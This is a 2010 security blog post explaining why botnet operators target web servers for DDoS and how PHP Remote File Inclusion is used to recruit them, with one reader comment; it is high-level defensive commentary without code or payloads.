Friday, May 14, 2010

Botnet Herders Targeting Web Servers

Submitted by Ryan Barnett 5/14/2010

Numerous media outlets have reported on a "new" DDoS botnet that is targeting web servers as zombie participants vs. standard user computers. The motivation for targeting web servers includes:
  1. Web servers are always online where as home computer systems are often shutdown when not in use. This means that the number of botnet systems in control at any one time is variable. This factors into the botnet owner's service offerings as they are often selling their botnet services and having a reliable, strong botnet is key.
  2. Web servers have more network bandwidth than home computer users. This essentially is a Quality of Service metric where commercial web servers are guaranteed specific amounts of network bandwidth usage whereas home computer users typically have much less bandwidth. Additionally, home user network traffic is oftentimes throttled which would make their DDoS attack traffic less.
  3. Web servers have more horse power then home computers. The number of CPUs, RAM, etc... means that commercial servers can generate much more network DDoS traffic then home computer systems.
  4. Web servers are less likely to be blacklisted by ISP vs. home computer systems. This means that web server botnet zombies will be online, sending traffic much longer than home computers.
Essentially, web server botnet participants are like "Super Soldiers" compared to normal grunts in the botnet army.

While the information presented by the media is interesting data, it is by no means a new tactic.


How do I know this? Because we (Breach Security) reported on this exact same concept 2 years ago in our WASC Web Hacking Incident Database Annual Report Presentation Slides.
What we showed was that botnet operators have been using PHP Remote File Inclusion (RFI) attacks to try and exploit web servers in order to download DDoS client code. This will force these systems into participating in DDoS attacks. RFI attacks are still a big problem and a surprising number of sites are still vulnerable even though newer versions of PHP have a more secure default configuration that prevents this exploit from working. As it happens with other types of software, organizations are just not able to upgrade their software in a timely manner to the newest versions that fix the flaws.

It is a shame that the new OWASP Top 10 Most Critical Web Application Security Risks release has removed the old A3: Malicious File Execution category as RFIs were included in it. The stated rationale for removing this is -
REMOVED: A3 – Malicious File Execution. This is still a significant problem in many different environments. However, its prevalence in 2007 was inflated by large numbers of PHP applications having this problem. PHP now ships with a more secure configuration by default, lowering the prevalence of this problem.
While I don't disagree with some of this rationale, the fact is that there are still many, many sites that are vulnerable to RFI attacks and recruiting the compromised web site into a Botnet Army is just one of the possible bad outcomes...

1 comment:

Wladimir Palant said...

You are right, I still see RFI attempts in my server logs. However, the volume is nowhere close to what I've seen in 2007. So I guess that the number of vulnerable web servers has gone down very significantly - and hence the decreased popularity of this attack.

Wladimir Palant